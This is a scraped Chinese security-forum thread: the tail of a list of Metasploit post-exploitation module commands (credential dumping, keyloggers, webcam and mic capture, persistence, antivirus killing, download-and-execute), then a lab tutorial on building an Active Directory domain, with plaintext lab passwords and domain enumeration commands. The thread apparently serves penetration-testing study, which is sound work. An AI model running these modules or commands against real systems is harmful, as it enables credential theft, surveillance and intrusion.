  170. run post/linux/busybox/enum_connections
  171. run post/linux/busybox/enum_hosts
  172. run post/linux/busybox/jailbreak
  173. run post/linux/busybox/ping_net
  174. run post/linux/busybox/set_dmz
  175. run post/linux/busybox/set_dns
  176. run post/linux/busybox/smb_share_root
  177. run post/linux/busybox/wget_exec
  178. run post/linux/dos/xen_420_dos
  179. run post/linux/gather/checkcontainer
  180. run post/linux/gather/checkvm
  181. run post/linux/gather/ecryptfs_creds
  182. run post/linux/gather/enum_commands
  183. run post/linux/gather/enum_configs
  184. run post/linux/gather/enum_containers
  185. run post/linux/gather/enum_nagios_xi
  186. run post/linux/gather/enum_network
  187. run post/linux/gather/enum_protections
  188. run post/linux/gather/enum_psk
  189. run post/linux/gather/enum_system
  190. run post/linux/gather/enum_users_history
  191. run post/linux/gather/gnome_commander_creds
  192. run post/linux/gather/gnome_keyring_dump
  193. run post/linux/gather/hashdump
  194. run post/linux/gather/mount_cifs_creds
  195. run post/linux/gather/openvpn_credentials
  196. run post/linux/gather/phpmyadmin_credsteal
  197. run post/linux/gather/pptpd_chap_secrets
  198. run post/linux/gather/tor_hiddenservices
  199. run post/linux/manage/dns_spoofing
  200. run post/linux/manage/download_exec
  201. run post/linux/manage/iptables_removal
  202. run post/linux/manage/pseudo_shell
  203. run post/linux/manage/sshkey_persistence
  204. run post/multi/escalate/aws_create_iam_user
  205. run post/multi/escalate/cups_root_file_read
  206. run post/multi/escalate/metasploit_pcaplog
  207. run post/multi/gather/apple_ios_backup
  208. run post/multi/gather/aws_ec2_instance_metadata
  209. run post/multi/gather/aws_keys
  210. run post/multi/gather/check_malware
  211. run post/multi/gather/chrome_cookies
  212. run post/multi/gather/dbvis_enum
  213. run post/multi/gather/dns_bruteforce
  214. run post/multi/gather/dns_reverse_lookup
  215. run post/multi/gather/dns_srv_lookup
  216. run post/multi/gather/docker_creds
  217. run post/multi/gather/enum_hexchat
  218. run post/multi/gather/enum_software_versions
  219. run post/multi/gather/enum_vbox
  220. run post/multi/gather/env
  221. run post/multi/gather/fetchmailrc_creds
  222. run post/multi/gather/filezilla_client_cred
  223. run post/multi/gather/find_vmx
  224. run post/multi/gather/firefox_creds
  225. run post/multi/gather/gpg_creds
  226. run post/multi/gather/grub_creds
  227. run post/multi/gather/irssi_creds
  228. run post/multi/gather/jboss_gather
  229. run post/multi/gather/jenkins_gather
  230. run post/multi/gather/lastpass_creds
  231. run post/multi/gather/maven_creds
  232. run post/multi/gather/multi_command
  233. run post/multi/gather/netrc_creds
  234. run post/multi/gather/pgpass_creds
  235. run post/multi/gather/pidgin_cred
  236. run post/multi/gather/ping_sweep
  237. run post/multi/gather/remmina_creds
  238. run post/multi/gather/resolve_hosts
  239. run post/multi/gather/rsyncd_creds
  240. run post/multi/gather/rubygems_api_key
  241. run post/multi/gather/run_console_rc_file
  242. run post/multi/gather/skype_enum
  243. run post/multi/gather/ssh_creds
  244. run post/multi/gather/thunderbird_creds
  245. run post/multi/gather/tomcat_gather
  246. run post/multi/gather/ubiquiti_unifi_backup
  247. run post/multi/gather/wlan_geolocate
  248. run post/multi/general/close
  249. run post/multi/general/execute
  250. run post/multi/general/wall
  251. run post/multi/manage/autoroute
  252. run post/multi/manage/dbvis_add_db_admin
  253. run post/multi/manage/dbvis_query
  254. run post/multi/manage/hsts_eraser
  255. run post/multi/manage/multi_post
  256. run post/multi/manage/open
  257. run post/multi/manage/play_youtube
  258. run post/multi/manage/record_mic
  259. run post/multi/manage/screensaver
  260. run post/multi/manage/screenshare
  261. run post/multi/manage/set_wallpaper
  262. run post/multi/manage/shell_to_meterpreter
  263. run post/multi/manage/sudo
  264. run post/multi/manage/system_session
  265. run post/multi/manage/upload_exec
  266. run post/multi/manage/zip
  267. run post/multi/recon/local_exploit_suggester
  268. run post/multi/recon/multiport_egress_traffic
  269. run post/multi/recon/sudo_commands
  270. run post/networking/gather/enum_brocade
  271. run post/networking/gather/enum_cisco
  272. run post/networking/gather/enum_f5
  273. run post/networking/gather/enum_juniper
  274. run post/networking/gather/enum_mikrotik
  275. run post/networking/gather/enum_vyos
  276. run post/osx/admin/say
  277. run post/osx/capture/keylog_recorder
  278. run post/osx/capture/screen
  279. run post/osx/escalate/tccbypass
  280. run post/osx/gather/apfs_encrypted_volume_passwd
  281. run post/osx/gather/autologin_password
  282. run post/osx/gather/enum_adium
  283. run post/osx/gather/enum_airport
  284. run post/osx/gather/enum_chicken_vnc_profile
  285. run post/osx/gather/enum_colloquy
  286. run post/osx/gather/enum_keychain
  287. run post/osx/gather/enum_messages
  288. run post/osx/gather/enum_osx
  289. run post/osx/gather/hashdump
  290. run post/osx/gather/password_prompt_spoof
  291. run post/osx/gather/safari_lastsession
  292. run post/osx/gather/vnc_password_osx
  293. run post/osx/manage/mount_share
  294. run post/osx/manage/record_mic
  295. run post/osx/manage/sonic_pi
  296. run post/osx/manage/vpn
  297. run post/osx/manage/webcam
  298. run post/solaris/escalate/pfexec
  299. run post/solaris/escalate/srsexec_readline
  300. run post/solaris/gather/checkvm
  301. run post/solaris/gather/enum_packages
  302. run post/solaris/gather/enum_services
  303. run post/solaris/gather/hashdump
  304. run post/windows/capture/keylog_recorder
  305. run post/windows/capture/lockout_keylogger
  306. run post/windows/escalate/droplnk
  307. run post/windows/escalate/getsystem
  308. run post/windows/escalate/golden_ticket
  309. run post/windows/escalate/ms10_073_kbdlayout
  310. run post/windows/escalate/screen_unlock
  311. run post/windows/escalate/unmarshal_cmd_exec
  312. run post/windows/gather/ad_to_sqlite
  313. run post/windows/gather/arp_scanner
  314. run post/windows/gather/avast_memory_dump
  315. run post/windows/gather/bitcoin_jacker
  316. run post/windows/gather/bitlocker_fvek
  317. run post/windows/gather/bloodhound
  318. run post/windows/gather/cachedump
  319. run post/windows/gather/checkvm
  320. run post/windows/gather/credentials/avira_password
  321. run post/windows/gather/credentials/bulletproof_ftp
  322. run post/windows/gather/credentials/coreftp
  323. run post/windows/gather/credentials/credential_collector
  324. run post/windows/gather/credentials/domain_hashdump
  325. run post/windows/gather/credentials/dynazip_log
  326. run post/windows/gather/credentials/dyndns
  327. run post/windows/gather/credentials/enum_cred_store
  328. run post/windows/gather/credentials/enum_laps
  329. run post/windows/gather/credentials/enum_picasa_pwds
  330. run post/windows/gather/credentials/epo_sql
  331. run post/windows/gather/credentials/filezilla_server
  332. run post/windows/gather/credentials/flashfxp
  333. run post/windows/gather/credentials/ftpnavigator
  334. run post/windows/gather/credentials/ftpx
  335. run post/windows/gather/credentials/gpp
  336. run post/windows/gather/credentials/heidisql
  337. run post/windows/gather/credentials/idm
  338. run post/windows/gather/credentials/imail
  339. run post/windows/gather/credentials/imvu
  340. run post/windows/gather/credentials/mcafee_vse_hashdump
  341. run post/windows/gather/credentials/mdaemon_cred_collector
  342. run post/windows/gather/credentials/meebo
  343. run post/windows/gather/credentials/mremote
  344. run post/windows/gather/credentials/mssql_local_hashdump
  345. run post/windows/gather/credentials/nimbuzz
  346. run post/windows/gather/credentials/outlook
  347. run post/windows/gather/credentials/pulse_secure
  348. run post/windows/gather/credentials/purevpn_cred_collector
  349. run post/windows/gather/credentials/razer_synapse
  350. run post/windows/gather/credentials/razorsql
  351. run post/windows/gather/credentials/rdc_manager_creds
  352. run post/windows/gather/credentials/securecrt
  353. run post/windows/gather/credentials/skype
  354. run post/windows/gather/credentials/smartermail
  355. run post/windows/gather/credentials/smartftp
  356. run post/windows/gather/credentials/spark_im
  357. run post/windows/gather/credentials/sso
  358. run post/windows/gather/credentials/steam
  359. run post/windows/gather/credentials/teamviewer_passwords
  360. run post/windows/gather/credentials/tortoisesvn
  361. run post/windows/gather/credentials/total_commander
  362. run post/windows/gather/credentials/trillian
  363. run post/windows/gather/credentials/vnc
  364. run post/windows/gather/credentials/windows_autologin
  365. run post/windows/gather/credentials/winscp
  366. run post/windows/gather/credentials/wsftp_client
  367. run post/windows/gather/credentials/xshell_xftp_password
  368. run post/windows/gather/dnscache_dump
  369. run post/windows/gather/dumplinks
  370. run post/windows/gather/enum_ad_bitlocker
  371. run post/windows/gather/enum_ad_computers
  372. run post/windows/gather/enum_ad_groups
  373. run post/windows/gather/enum_ad_managedby_groups
  374. run post/windows/gather/enum_ad_service_principal_names
  375. run post/windows/gather/enum_ad_to_wordlist
  376. run post/windows/gather/enum_ad_user_comments
  377. run post/windows/gather/enum_ad_users
  378. run post/windows/gather/enum_applications
  379. run post/windows/gather/enum_artifacts
  380. run post/windows/gather/enum_av_excluded
  381. run post/windows/gather/enum_chrome
  382. run post/windows/gather/enum_computers
  383. run post/windows/gather/enum_db
  384. run post/windows/gather/enum_devices
  385. run post/windows/gather/enum_dirperms
  386. run post/windows/gather/enum_domain
  387. run post/windows/gather/enum_domain_group_users
  388. run post/windows/gather/enum_domain_tokens
  389. run post/windows/gather/enum_domain_users
  390. run post/windows/gather/enum_domains
  391. run post/windows/gather/enum_emet
  392. run post/windows/gather/enum_files
  393. run post/windows/gather/enum_hostfile
  394. run post/windows/gather/enum_hyperv_vms
  395. run post/windows/gather/enum_ie
  396. run post/windows/gather/enum_logged_on_users
  397. run post/windows/gather/enum_ms_product_keys
  398. run post/windows/gather/enum_muicache
  399. run post/windows/gather/enum_onedrive
  400. run post/windows/gather/enum_patches
  401. run post/windows/gather/enum_powershell_env
  402. run post/windows/gather/enum_prefetch
  403. run post/windows/gather/enum_proxy
  404. run post/windows/gather/enum_putty_saved_sessions
  405. run post/windows/gather/enum_services
  406. run post/windows/gather/enum_shares
  407. run post/windows/gather/enum_snmp
  408. run post/windows/gather/enum_termserv
  409. run post/windows/gather/enum_tokens
  410. run post/windows/gather/enum_tomcat
  411. run post/windows/gather/enum_trusted_locations
  412. run post/windows/gather/enum_unattend
  413. run post/windows/gather/file_from_raw_ntfs
  414. run post/windows/gather/forensics/browser_history
  415. run post/windows/gather/forensics/duqu_check
  416. run post/windows/gather/forensics/enum_drives
  417. run post/windows/gather/forensics/fanny_bmp_check
  418. run post/windows/gather/forensics/imager
  419. run post/windows/gather/forensics/nbd_server
  420. run post/windows/gather/forensics/recovery_files
  421. run post/windows/gather/hashdump
  422. run post/windows/gather/local_admin_search_enum
  423. run post/windows/gather/lsa_secrets
  424. run post/windows/gather/make_csv_orgchart
  425. run post/windows/gather/memory_grep
  426. run post/windows/gather/netlm_downgrade
  427. run post/windows/gather/ntds_grabber
  428. run post/windows/gather/ntds_location
  429. run post/windows/gather/outlook
  430. run post/windows/gather/phish_windows_credentials
  431. run post/windows/gather/psreadline_history
  432. run post/windows/gather/resolve_sid
  433. run post/windows/gather/reverse_lookup
  434. run post/windows/gather/screen_spy
  435. run post/windows/gather/smart_hashdump
  436. run post/windows/gather/tcpnetstat
  437. run post/windows/gather/usb_history
  438. run post/windows/gather/win_privs
  439. run post/windows/gather/wmic_command
  440. run post/windows/gather/word_unc_injector
  441. run post/windows/manage/add_user
  442. run post/windows/manage/archmigrate
  443. run post/windows/manage/change_password
  444. run post/windows/manage/clone_proxy_settings
  445. run post/windows/manage/delete_user
  446. run post/windows/manage/download_exec
  447. run post/windows/manage/driver_loader
  448. run post/windows/manage/enable_rdp
  449. run post/windows/manage/enable_support_account
  450. run post/windows/manage/exec_powershell
  451. run post/windows/manage/execute_dotnet_assembly
  452. run post/windows/manage/forward_pageant
  453. run post/windows/manage/hashcarve
  454. run post/windows/manage/ie_proxypac
  455. run post/windows/manage/inject_ca
  456. run post/windows/manage/inject_host
  457. run post/windows/manage/install_python
  458. run post/windows/manage/install_ssh
  459. run post/windows/manage/killav
  460. run post/windows/manage/migrate
  461. run post/windows/manage/mssql_local_auth_bypass
  462. run post/windows/manage/multi_meterpreter_inject
  463. run post/windows/manage/nbd_server
  464. run post/windows/manage/peinjector
  465. run post/windows/manage/persistence_exe
  466. run post/windows/manage/portproxy
  467. run post/windows/manage/powershell/build_net_code
  468. run post/windows/manage/powershell/exec_powershell
  469. run post/windows/manage/powershell/load_script
  470. run post/windows/manage/pptp_tunnel
  471. run post/windows/manage/priv_migrate
  472. run post/windows/manage/pxeexploit
  473. run post/windows/manage/reflective_dll_inject
  474. run post/windows/manage/remove_ca
  475. run post/windows/manage/remove_host
  476. run post/windows/manage/rid_hijack
  477. run post/windows/manage/rollback_defender_signatures
  478. run post/windows/manage/rpcapd_start
  479. run post/windows/manage/run_as
  480. run post/windows/manage/run_as_psh
  481. run post/windows/manage/sdel
  482. run post/windows/manage/shellcode_inject
  483. run post/windows/manage/sshkey_persistence
  484. run post/windows/manage/sticky_keys
  485. run post/windows/manage/vmdk_mount
  486. run post/windows/manage/vss
  487. run post/windows/manage/vss_create
  488. run post/windows/manage/vss_list
  489. run post/windows/manage/vss_mount
  490. run post/windows/manage/vss_set_storage
  491. run post/windows/manage/vss_storage
  492. run post/windows/manage/wdigest_caching
  493. run post/windows/manage/webcam
  494. run post/windows/recon/computer_browser_discovery
  495. run post/windows/recon/outbound_ports
  496. run post/windows/recon/resolve_ip
  497. run post/windows/wlan/wlan_bss_list
  498. run post/windows/wlan/wlan_current_connection
  499. run post/windows/wlan/wlan_disconnect
  500. run post/windows/wlan/wlan_probe_request
  501. run post/windows/wlan/wlan_profile
  502. run powerdump
  503. run prefetchtool
  504. run process_memdump
  505. run remotewinenum
  506. run scheduleme
  507. run schelevator
  508. run schtasksabuse
  509. run scraper
  510. run screen_unlock
  511. run screenspy
  512. run search_dwld
  513. run service_manager
  514. run service_permissions_escalate
  515. run sound_recorder
  516. run srt_webdrive_priv
  517. run uploadexec
  518. run virtualbox_sysenter_dos
  519. run virusscan_bypass
  520. run vnc
  521. run webcam
  522. run winbf
  523. run winenum
  524. run wmic</code></pre>
  525. <span class="cke_reset cke_widget_drag_handler_container" style="background: url(" https:="" csdnimg.cn="" release="" blog_editor_html="" release1.9.7="" ckeditor="" plugins="" widget="" images="" handle.png")="" rgba(220,="" 220,="" 0.5);="" top:="" 0px;="" left:="" 0px;"=""><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" height="15" role="presentation" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" title="点击并拖拽以移动" width="15"></span>
复制代码





回复

使用道具 举报

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
 楼主| 发表于 2022-1-9 14:14:47 | 显示全部楼层

域环境的搭建

本帖最后由 Xor0ne 于 2022-1-9 14:18 编辑

​目录如下所示:​​​
  
1.域控
windows server 2021 R2 DC
IP:192.168.159.136默认网关:192.168.159.2DNS服务器:192.168.159.2

step1:重命名该服务器为DC

step2:安装域

下一步(默认)

下一步(默认)

下一步(默认)

直到服务器角色,勾选Active Directory 域服务

下一步(默认)

下一步(默认),下一步(默认),安装

安装完毕,选择 “将此服务器提升为域控制器 ”。(也可以服务器管理器界面,右上角有个感叹号,那里也可以选择 “将此服务器提升为域控制器,如下图所示。)

step3:提升为域控制器
选择“添加新林”,设置根域名

输入目录服务还原模式(DSRM)密码(Administrator的密码)
@dministrator1999

下一步(默认)

下一步(默认)

下一步(默认)

下一步(默认)

下一步(默认)

安装

PS:安装的时候出现如下问题,发现是自己的密码填写错误,所以说密码一定要正确啊。

安装后将会自动重启,并且登录模式变成了域账号的登录模式 。

2.域内主机:
windows7 作为域内主机,所以设置DNS服务器为windows server 2012的IP地址(域控的地址)192.168.159.136
(我这里windows7配置的是双网卡机器,所以我选择域内机器时应选择的是与域控在同一网络内的网络作为域内主机。)
配置的域内主机windows7如下所示:
IP:192.168.159.6默认网关:192.168.159.2DNS服务器:192.168.159.2


step1: 成员主机入域
不断地下一步,如下输入xorone.com 域的域管理员密码
administrator/@dministrator2021

下一步默认,设置本机器名字与需要加入的域名(索然我域控那里的域名填的是小写,到那时这里填大写也没问题哦,,主要是到这里的时候就自动转换为大写了。。)

下一步(默认),按照提示填入有权限加入该域的某账户的名称与密码。

下一步(默认),账户权限。

step2: 查看域成员主机

step3: 添加域账号
右键域xorone.com

添加组织单位(安全部)

在安全部里面添加用户

设置密码
@nquanbu2021


step4: 登录域xorone
  1. xorone\jiaozi
  2. @nquanbu2021
复制代码



step5:域环境验证。
  1. # 查看域内用户
  2. net user /domain
复制代码




  1. # 查看域管理员
  2. net group "domain admins" /domain
复制代码




  1. # 定位域控
  2. nslookup
  3. set type=all
  4. ldap.tcp.dc._msdcs.DOMAIN_NAME
复制代码







回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 23:32 , Processed in 0.048359 second(s), 17 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表